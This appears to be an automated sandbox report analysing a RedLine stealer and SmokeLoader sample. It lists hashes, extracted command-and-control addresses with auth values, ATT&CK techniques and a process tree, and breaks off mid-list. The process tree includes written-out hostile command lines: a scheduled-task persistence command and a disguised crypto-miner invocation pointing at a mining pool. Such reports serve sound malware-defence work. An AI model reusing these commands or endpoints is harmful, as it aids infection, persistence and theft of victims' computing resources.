redline | f3bb5fcb2121672e8a96b5d1588f1a85c2769bc12090430384de75411928d824

Analysis

max time kernel
79s
max time network
150s
platform
windows10-1703_x64
resource
win10-20220812-en
resource tags

arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
submitted
26/10/2022, 08:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f3bb5fcb2121672e8a96b5d1588f1a85c2769bc12090430384de75411928d824.exe
Size

222KB
MD5

bc85cff684197a4f70bdc06d12938e4f
SHA1

9409b56544cd67a3138262ca4d1946614afaa48d
SHA256

f3bb5fcb2121672e8a96b5d1588f1a85c2769bc12090430384de75411928d824
SHA512

8abfc9ec0fb44730098acf1f67b3b905a184e25b167ae666563e0ad1b8ad1341352058c9d5924f39958f6c94fe499f2aedee154037d3e44aecad586f9e7640db
SSDEEP

6144:ivbCkEY7XdLp1d/4lmq4V7ktutRIO+HEO1vL:ivbCkl7Nd1dAlgVdtMNL

Score

10^/10

redline smokeloader 1310 fote google2 nam7 slovarik15btc backdoor discovery infostealer spyware stealer trojan upx

Malware Config

Extracted

Family

redline

Botnet

nam7

103.89.90.61:34589

Attributes

auth_value
533c8fbdab4382453812c73ea2cee5b8

Extracted

Family

redline

Botnet

Fote

79.137.199.60:4691

Attributes

auth_value
e063cd2fd03a8d8334b8d7c3a7b0e7ef

Extracted

Family

redline

Botnet

slovarik15btc

78.153.144.3:2510

Attributes

auth_value
bfedad55292538ad3edd07ac95ad8952

Extracted

Family

redline

Botnet

Google2

167.235.71.14:20469

Attributes

auth_value
fb274d9691235ba015830da570a13578

Extracted

Family

redline

Botnet

1310

79.137.192.57:48771

Attributes

auth_value
feb5f5c29913f32658637e553762a40e

Signatures

Detects Smokeloader packer 2 IoCs

resource	yara_rule
behavioral1/memory/2464-133-0x00000000008D0000-0x00000000008D9000-memory.dmp	family_smokeloader
behavioral1/memory/2464-153-0x00000000008D0000-0x00000000008D9000-memory.dmp	family_smokeloader

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 10 IoCs

resource	yara_rule
behavioral1/memory/4052-188-0x00000000001B0000-0x00000000001D8000-memory.dmp	family_redline
behavioral1/memory/4052-196-0x00000000001D2136-mapping.dmp	family_redline
behavioral1/memory/2232-255-0x0000000002580000-0x00000000025BE000-memory.dmp	family_redline
behavioral1/memory/2232-272-0x0000000004C50000-0x0000000004C8C000-memory.dmp	family_redline
behavioral1/memory/3732-347-0x00000000005B2142-mapping.dmp	family_redline
behavioral1/memory/3732-379-0x0000000000590000-0x00000000005B8000-memory.dmp	family_redline
behavioral1/memory/4508-427-0x00000000005A21AE-mapping.dmp	family_redline
behavioral1/memory/4508-478-0x0000000000580000-0x00000000005A8000-memory.dmp	family_redline
behavioral1/memory/95924-600-0x000000000492216E-mapping.dmp	family_redline
behavioral1/memory/95924-641-0x0000000004900000-0x0000000004928000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Downloads MZ/PE file

Executes dropped EXE 10 IoCs

pid	Process
5072	DDC2.exe
2232	E257.exe
4692	7C2.exe
4968	B9C.exe
4084	1689.exe
2060	UbcHhFhbkSBskFSBEsBKFCAcShcFskcBfCACcHFHAHCABBBCFCAHHbF.exe
4080	27C1.exe
4616	LYKAA.exe
3256	3A7F.exe
4508	5904.exe

UPX packed file 8 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000700000001ac3e-541.dat	upx
behavioral1/memory/4080-548-0x00007FF6DA9F0000-0x00007FF6DB253000-memory.dmp	upx
behavioral1/memory/4080-692-0x00007FF6DA9F0000-0x00007FF6DB253000-memory.dmp	upx
behavioral1/files/0x000700000001ac4c-695.dat	upx
behavioral1/files/0x000700000001ac4c-696.dat	upx
behavioral1/memory/4508-698-0x00000000011A0000-0x0000000001FE1000-memory.dmp	upx
behavioral1/memory/4508-1017-0x00000000011A0000-0x0000000001FE1000-memory.dmp	upx
behavioral1/memory/4080-1297-0x00007FF6DA9F0000-0x00007FF6DB253000-memory.dmp	upx

Deletes itself 1 IoCs

pid	Process
2880	Process not Found

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 5072 set thread context of 4052	5072	DDC2.exe	68
PID 4692 set thread context of 3732	4692	7C2.exe	70
PID 4968 set thread context of 4508	4968	B9C.exe	72
PID 3256 set thread context of 95924	3256	3A7F.exe	86
PID 4616 set thread context of 4052	4616	LYKAA.exe	89

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
96088	3256	WerFault.exe	84

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	f3bb5fcb2121672e8a96b5d1588f1a85c2769bc12090430384de75411928d824.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	f3bb5fcb2121672e8a96b5d1588f1a85c2769bc12090430384de75411928d824.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	f3bb5fcb2121672e8a96b5d1588f1a85c2769bc12090430384de75411928d824.exe

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
3860	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2224	timeout.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2464	f3bb5fcb2121672e8a96b5d1588f1a85c2769bc12090430384de75411928d824.exe
2464	f3bb5fcb2121672e8a96b5d1588f1a85c2769bc12090430384de75411928d824.exe
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2880	Process not Found

Suspicious behavior: MapViewOfSection 19 IoCs

pid	Process
2464	f3bb5fcb2121672e8a96b5d1588f1a85c2769bc12090430384de75411928d824.exe
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found
2880	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2232	E257.exe
Token: SeShutdownPrivilege	2880	Process not Found
Token: SeCreatePagefilePrivilege	2880	Process not Found
Token: SeShutdownPrivilege	2880	Process not Found
Token: SeCreatePagefilePrivilege	2880	Process not Found
Token: SeShutdownPrivilege	2880	Process not Found
Token: SeCreatePagefilePrivilege	2880	Process not Found
Token: SeShutdownPrivilege	2880	Process not Found
Token: SeCreatePagefilePrivilege	2880	Process not Found
Token: SeShutdownPrivilege	2880	Process not Found
Token: SeCreatePagefilePrivilege	2880	Process not Found
Token: SeShutdownPrivilege	2880	Process not Found
Token: SeCreatePagefilePrivilege	2880	Process not Found
Token: SeShutdownPrivilege	2880	Process not Found
Token: SeCreatePagefilePrivilege	2880	Process not Found
Token: SeShutdownPrivilege	2880	Process not Found
Token: SeCreatePagefilePrivilege	2880	Process not Found
Token: SeDebugPrivilege	2060	UbcHhFhbkSBskFSBEsBKFCAcShcFskcBfCACcHFHAHCABBBCFCAHHbF.exe
Token: SeShutdownPrivilege	2880	Process not Found
Token: SeCreatePagefilePrivilege	2880	Process not Found
Token: SeShutdownPrivilege	2880	Process not Found
Token: SeCreatePagefilePrivilege	2880	Process not Found
Token: SeDebugPrivilege	4616	LYKAA.exe
Token: SeShutdownPrivilege	2880	Process not Found
Token: SeCreatePagefilePrivilege	2880	Process not Found
Token: SeShutdownPrivilege	2880	Process not Found
Token: SeCreatePagefilePrivilege	2880	Process not Found
Token: SeShutdownPrivilege	2880	Process not Found
Token: SeCreatePagefilePrivilege	2880	Process not Found
Token: SeShutdownPrivilege	2880	Process not Found
Token: SeCreatePagefilePrivilege	2880	Process not Found
Token: SeShutdownPrivilege	2880	Process not Found
Token: SeCreatePagefilePrivilege	2880	Process not Found
Token: SeShutdownPrivilege	2880	Process not Found
Token: SeCreatePagefilePrivilege	2880	Process not Found
Token: SeDebugPrivilege	3732	RegSvcs.exe
Token: SeDebugPrivilege	4508	RegSvcs.exe
Token: SeDebugPrivilege	4052	RegSvcs.exe
Token: SeShutdownPrivilege	2880	Process not Found
Token: SeCreatePagefilePrivilege	2880	Process not Found
Token: SeShutdownPrivilege	2880	Process not Found
Token: SeCreatePagefilePrivilege	2880	Process not Found
Token: SeShutdownPrivilege	2880	Process not Found
Token: SeCreatePagefilePrivilege	2880	Process not Found
Token: SeShutdownPrivilege	2880	Process not Found
Token: SeCreatePagefilePrivilege	2880	Process not Found
Token: SeShutdownPrivilege	2880	Process not Found
Token: SeCreatePagefilePrivilege	2880	Process not Found
Token: SeShutdownPrivilege	2880	Process not Found
Token: SeCreatePagefilePrivilege	2880	Process not Found
Token: SeShutdownPrivilege	2880	Process not Found
Token: SeCreatePagefilePrivilege	2880	Process not Found
Token: SeShutdownPrivilege	2880	Process not Found
Token: SeCreatePagefilePrivilege	2880	Process not Found
Token: SeShutdownPrivilege	2880	Process not Found
Token: SeCreatePagefilePrivilege	2880	Process not Found
Token: SeShutdownPrivilege	2880	Process not Found
Token: SeCreatePagefilePrivilege	2880	Process not Found
Token: SeShutdownPrivilege	2880	Process not Found
Token: SeCreatePagefilePrivilege	2880	Process not Found
Token: SeShutdownPrivilege	2880	Process not Found
Token: SeCreatePagefilePrivilege	2880	Process not Found
Token: SeShutdownPrivilege	2880	Process not Found
Token: SeCreatePagefilePrivilege	2880	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2880 wrote to memory of 5072	2880	Process not Found	66
PID 2880 wrote to memory of 5072	2880	Process not Found	66
PID 2880 wrote to memory of 5072	2880	Process not Found	66
PID 2880 wrote to memory of 2232	2880	Process not Found	67
PID 2880 wrote to memory of 2232	2880	Process not Found	67
PID 2880 wrote to memory of 2232	2880	Process not Found	67
PID 5072 wrote to memory of 4052	5072	DDC2.exe	68
PID 5072 wrote to memory of 4052	5072	DDC2.exe	68
PID 5072 wrote to memory of 4052	5072	DDC2.exe	68
PID 5072 wrote to memory of 4052	5072	DDC2.exe	68
PID 5072 wrote to memory of 4052	5072	DDC2.exe	68
PID 2880 wrote to memory of 4692	2880	Process not Found	69
PID 2880 wrote to memory of 4692	2880	Process not Found	69
PID 2880 wrote to memory of 4692	2880	Process not Found	69
PID 4692 wrote to memory of 3732	4692	7C2.exe	70
PID 4692 wrote to memory of 3732	4692	7C2.exe	70
PID 4692 wrote to memory of 3732	4692	7C2.exe	70
PID 4692 wrote to memory of 3732	4692	7C2.exe	70
PID 4692 wrote to memory of 3732	4692	7C2.exe	70
PID 2880 wrote to memory of 4968	2880	Process not Found	71
PID 2880 wrote to memory of 4968	2880	Process not Found	71
PID 2880 wrote to memory of 4968	2880	Process not Found	71
PID 4968 wrote to memory of 4508	4968	B9C.exe	72
PID 4968 wrote to memory of 4508	4968	B9C.exe	72
PID 4968 wrote to memory of 4508	4968	B9C.exe	72
PID 4968 wrote to memory of 4508	4968	B9C.exe	72
PID 4968 wrote to memory of 4508	4968	B9C.exe	72
PID 2880 wrote to memory of 4084	2880	Process not Found	74
PID 2880 wrote to memory of 4084	2880	Process not Found	74
PID 4084 wrote to memory of 2060	4084	1689.exe	75
PID 4084 wrote to memory of 2060	4084	1689.exe	75
PID 2060 wrote to memory of 4572	2060	UbcHhFhbkSBskFSBEsBKFCAcShcFskcBfCACcHFHAHCABBBCFCAHHbF.exe	76
PID 2060 wrote to memory of 4572	2060	UbcHhFhbkSBskFSBEsBKFCAcShcFskcBfCACcHFHAHCABBBCFCAHHbF.exe	76
PID 4572 wrote to memory of 2224	4572	cmd.exe	78
PID 4572 wrote to memory of 2224	4572	cmd.exe	78
PID 2880 wrote to memory of 4080	2880	Process not Found	79
PID 2880 wrote to memory of 4080	2880	Process not Found	79
PID 4572 wrote to memory of 4616	4572	cmd.exe	80
PID 4572 wrote to memory of 4616	4572	cmd.exe	80
PID 4616 wrote to memory of 1912	4616	LYKAA.exe	81
PID 4616 wrote to memory of 1912	4616	LYKAA.exe	81
PID 1912 wrote to memory of 3860	1912	cmd.exe	83
PID 1912 wrote to memory of 3860	1912	cmd.exe	83
PID 2880 wrote to memory of 3256	2880	Process not Found	84
PID 2880 wrote to memory of 3256	2880	Process not Found	84
PID 2880 wrote to memory of 3256	2880	Process not Found	84
PID 3256 wrote to memory of 95924	3256	3A7F.exe	86
PID 3256 wrote to memory of 95924	3256	3A7F.exe	86
PID 3256 wrote to memory of 95924	3256	3A7F.exe	86
PID 3256 wrote to memory of 95924	3256	3A7F.exe	86
PID 3256 wrote to memory of 95924	3256	3A7F.exe	86
PID 4616 wrote to memory of 4052	4616	LYKAA.exe	89
PID 4616 wrote to memory of 4052	4616	LYKAA.exe	89
PID 4616 wrote to memory of 4052	4616	LYKAA.exe	89
PID 4616 wrote to memory of 4052	4616	LYKAA.exe	89
PID 4616 wrote to memory of 4052	4616	LYKAA.exe	89
PID 4616 wrote to memory of 4052	4616	LYKAA.exe	89
PID 4616 wrote to memory of 4052	4616	LYKAA.exe	89
PID 4616 wrote to memory of 4052	4616	LYKAA.exe	89
PID 4616 wrote to memory of 4052	4616	LYKAA.exe	89
PID 4616 wrote to memory of 4052	4616	LYKAA.exe	89
PID 4616 wrote to memory of 4052	4616	LYKAA.exe	89
PID 4616 wrote to memory of 4052	4616	LYKAA.exe	89
PID 4616 wrote to memory of 4052	4616	LYKAA.exe	89

C:\Users\Admin\AppData\Local\Temp\f3bb5fcb2121672e8a96b5d1588f1a85c2769bc12090430384de75411928d824.exe
"C:\Users\Admin\AppData\Local\Temp\f3bb5fcb2121672e8a96b5d1588f1a85c2769bc12090430384de75411928d824.exe"
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2464

C:\Users\Admin\AppData\Local\Temp\DDC2.exe
C:\Users\Admin\AppData\Local\Temp\DDC2.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:5072
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4052

C:\Users\Admin\AppData\Local\Temp\E257.exe
C:\Users\Admin\AppData\Local\Temp\E257.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2232

C:\Users\Admin\AppData\Local\Temp\7C2.exe
C:\Users\Admin\AppData\Local\Temp\7C2.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4692
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3732

C:\Users\Admin\AppData\Local\Temp\B9C.exe
C:\Users\Admin\AppData\Local\Temp\B9C.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4968
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4508

C:\Users\Admin\AppData\Local\Temp\1689.exe
C:\Users\Admin\AppData\Local\Temp\1689.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4084
- C:\Users\Admin\AppData\Roaming\UbcHhFhbkSBskFSBEsBKFCAcShcFskcBfCACcHFHAHCABBBCFCAHHbF.exe
  "C:\Users\Admin\AppData\Roaming\UbcHhFhbkSBskFSBEsBKFCAcShcFskcBfCACcHFHAHCABBBCFCAHHbF.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp1A6D.tmp.bat""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4572
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:2224
  - - C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe
      "C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4616
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "LYKAA" /tr "C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1912
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "LYKAA" /tr "C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe"
        6⤵
        Creates scheduled task(s)
        
        PID:3860
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RKsS6XcgidDNc8rU38Yiv5STQutyMUu9A4.test -p x -t 5
        5⤵
        
        PID:4052
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        6⤵
        
        PID:96216

C:\Users\Admin\AppData\Local\Temp\27C1.exe
C:\Users\Admin\AppData\Local\Temp\27C1.exe
1⤵
- Executes dropped EXE
PID:4080
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "" "Get-WmiObject Win32_PortConnector"
  2⤵
  PID:96204

C:\Users\Admin\AppData\Local\Temp\3A7F.exe
C:\Users\Admin\AppData\Local\Temp\3A7F.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3256
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
  2⤵
  PID:95924
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 3256 -s 184584
  2⤵
  - Program crash
  PID:96088

C:\Users\Admin\AppData\Local\Temp\5904.exe
C:\Users\Admin\AppData\Local\Temp\5904.exe
1⤵
- Executes dropped EXE
PID:4508
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "" "Get-WmiObject Win32_PortConnector"
  2⤵
  PID:96104

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:95992

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:96176

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3796

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:4168

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4944

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:96192

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:696

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:96160

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:2692

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Scripting

T1064

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Scripting

T1064

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe

Filesize
836KB

MD5
6bfb71e4fc04d577aeba46eb3412b4fa

SHA1
21a79a3829d6ffde7ce09e8ee237ec76b2f981ac

SHA256
34ef414650a9bff1205c4483b8f87f887c9f7f133df4ed65ffda04426c0473d0

SHA512
5d536aa610b50dc5e28a855b03d0dffeff618ba5f33fc021c5651b5eec4f85783bcab08157bbc587224a867c22aa36bb11d3d07fc1a73c46b264d9c46c41a6be

Download Submit
C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe

Filesize
836KB

MD5
6bfb71e4fc04d577aeba46eb3412b4fa

SHA1
21a79a3829d6ffde7ce09e8ee237ec76b2f981ac

SHA256
34ef414650a9bff1205c4483b8f87f887c9f7f133df4ed65ffda04426c0473d0

SHA512
5d536aa610b50dc5e28a855b03d0dffeff618ba5f33fc021c5651b5eec4f85783bcab08157bbc587224a867c22aa36bb11d3d07fc1a73c46b264d9c46c41a6be

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
17286868c0a043ae5d2ff5798b6a3163

SHA1
b83b23cd57c7fb2c937f5bc18aeb7ddc955b5401

SHA256
40321e18ed0b9eb7e3bc937d3e207ea2039ff45267483ddb4a51f7974475dac6

SHA512
e15c11982c0569a389a7dbd0889edd1ef9a8ffb21c0e8ffadebc10e1353f4485524b18ca8e041c66c98d05fb984544da122755e6c2a25728453aeaf4175bdee1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log

Filesize
2KB

MD5
950a5d28e7306ee449764f305d2b2cbd

SHA1
284712d20f02bf24f1a85accf74579d12f6a8c93

SHA256
53511f86dd7a3c1fa14ecb4c61103ec64488f105adc4c0eb475a1d019967d934

SHA512
078fbc633072edd2b1240ec87ec1adb81e548a80ee695d676b181c25fe0cc9105e7ad3188ebb14918882d30167a14af13c1767564bcda40616222b050bbe201a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5fd4c81cca5461d5350df14e487a4c47

SHA1
b5ee4fd86164ce6592ef62029d881678e8de23dc

SHA256
b58bd77460635c41f988277a9ff62d915f510258bd722329e13030035d15771a

SHA512
b118dbdd3508fcf794d26bfed87440c19d2712d0a52678cc7b1c72584e243501219fd089fbda4bb8785cdc64e3c01b5f22c9883182d96721f6f810e92cef4283

Download Submit
C:\Users\Admin\AppData\Local\Temp\1689.exe

Filesize
1.1MB

MD5
de13415883a0ce890e192af659fcf88e

SHA1
29e798a45ef4b766de0ad2bbc69a869779b0be1d

SHA256
be73afa7a9b39a447b38dc20b76017742364402e4dcaf629a014a694ed202d6a

SHA512
87e90bec47ccfd69008e656c53ed29ae9a7da98a13f4f51584f186f3b3c1d1406296059b8f5e8873800d2293e7f2034b8f7261bf7751653fd68174c928c32a9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\1689.exe

Filesize
1.1MB

MD5
de13415883a0ce890e192af659fcf88e

SHA1
29e798a45ef4b766de0ad2bbc69a869779b0be1d

SHA256
be73afa7a9b39a447b38dc20b76017742364402e4dcaf629a014a694ed202d6a

SHA512
87e90bec47ccfd69008e656c53ed29ae9a7da98a13f4f51584f186f3b3c1d1406296059b8f5e8873800d2293e7f2034b8f7261bf7751653fd68174c928c32a9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\27C1.exe

Filesize
2.6MB

MD5
701b03f316f1906936a7882afb8e93c6

SHA1
305c0d52f4e83661d604c01ee1a0171b2532b380

SHA256
b4c758e51a6f76ed43e0219aac7367af7d7b54c12130a39fdad3caa1f402d675

SHA512
08fcd469bc2ca2ca83d27ce17e7eb2852d5bfa3bd7a7e4183bb0789915f15f1ba056cd2b12d3aaf72035ffe0af0198ef5dea86d1dd9412cb3f9ec8e07890cef6

Download Submit
C:\Users\Admin\AppData\Local\Temp\3A7F.exe

Filesize
2.4MB

MD5
787b49b82984badfcd8c84995d2adeff

SHA1
21dbb85afb21ad6f7c8397e5a317f404bd0363a3

SHA256
1d2268763aac9e8cdb2bf24a55042ef39ac34b55d02825622366e65e875abef3

SHA512
222f1fc34c452dbc94a062bc8d4219fa23fa8bc10495643796bbf84c8b8d78930afbb202fc3e99bfcdc86d31dcb071f3c68872c7de37b6946c73a69ff32352b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\3A7F.exe

Filesize
2.4MB

MD5
787b49b82984badfcd8c84995d2adeff

SHA1
21dbb85afb21ad6f7c8397e5a317f404bd0363a3

SHA256
1d2268763aac9e8cdb2bf24a55042ef39ac34b55d02825622366e65e875abef3

SHA512
222f1fc34c452dbc94a062bc8d4219fa23fa8bc10495643796bbf84c8b8d78930afbb202fc3e99bfcdc86d31dcb071f3c68872c7de37b6946c73a69ff32352b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\5904.exe

Filesize
4.3MB

MD5
c3be257c7fc7f656d5013af385e2cd13

SHA1
158c7a2b783ef5f0a17aa573f76a56916053146a

SHA256
cc370f70196231a5d21e2d5f0365b625274267b9f03602e363cdb7236a7d8195

SHA512
a41193871fdda8a4ad267f166ab3bf9dffc25aa37ec56b864dab4d13aaa138eb0ad0302442da0cb228fd82c8d1a5c22da3cf0ce672950c59f3ef156b408afc08

Download Submit
C:\Users\Admin\AppData\Local\Temp\5904.exe

Filesize
4.3MB

MD5
c3be257c7fc7f656d5013af385e2cd13

SHA1
158c7a2b783ef5f0a17aa573f76a56916053146a

SHA256
cc370f70196231a5d21e2d5f0365b625274267b9f03602e363cdb7236a7d8195

SHA512
a41193871fdda8a4ad267f166ab3bf9dffc25aa37ec56b864dab4d13aaa138eb0ad0302442da0cb228fd82c8d1a5c22da3cf0ce672950c59f3ef156b408afc08

Download Submit
C:\Users\Admin\AppData\Local\Temp\7C2.exe

Filesize
341KB

MD5
4e72774252bb576d40df56a6ddd4767d

SHA1
e7d406a125dc9d2b007d50d7736d298702a51d41

SHA256
59500fb9f9d7905ad99254d928a094cd80b04b61a4998630dffd0f2d0c815483

SHA512
738f8f39d87cde28927b7ada07eeb960e660a3d955133dde5ad4b5bddede4f1f5a8d98d949df9179dda7a17697f661dd61e086f940be80a7d11fe480241bf467

Download Submit
C:\Users\Admin\AppData\Local\Temp\7C2.exe

Filesize
341KB

MD5
4e72774252bb576d40df56a6ddd4767d

SHA1
e7d406a125dc9d2b007d50d7736d298702a51d41

SHA256
59500fb9f9d7905ad99254d928a094cd80b04b61a4998630dffd0f2d0c815483

SHA512
738f8f39d87cde28927b7ada07eeb960e660a3d955133dde5ad4b5bddede4f1f5a8d98d949df9179dda7a17697f661dd61e086f940be80a7d11fe480241bf467

Download Submit
C:\Users\Admin\AppData\Local\Temp\B9C.exe

Filesize
341KB

MD5
c16fefc76b4b17e76cde05f9b2e2706e

SHA1
d6c5b4d6299c18fe6dfc11fbb05a234e698ee3ea

SHA256
20f3d8655ae7b99bab5be4d49bd0f572cdbabc18dffa5fa79d0719ec599a8bf8

SHA512
077a67484f30f030da86eb0fe3ac17b64d8d12dd89b88abc697537dc68aec96f276553129707f905ffcb5c92dcd62bd0d93de4cd0187d57de0c88396bb95e70a

Download Submit
C:\Users\Admin\AppData\Local\Temp\B9C.exe

Filesize
341KB

MD5
c16fefc76b4b17e76cde05f9b2e2706e

SHA1
d6c5b4d6299c18fe6dfc11fbb05a234e698ee3ea

SHA256
20f3d8655ae7b99bab5be4d49bd0f572cdbabc18dffa5fa79d0719ec599a8bf8

SHA512
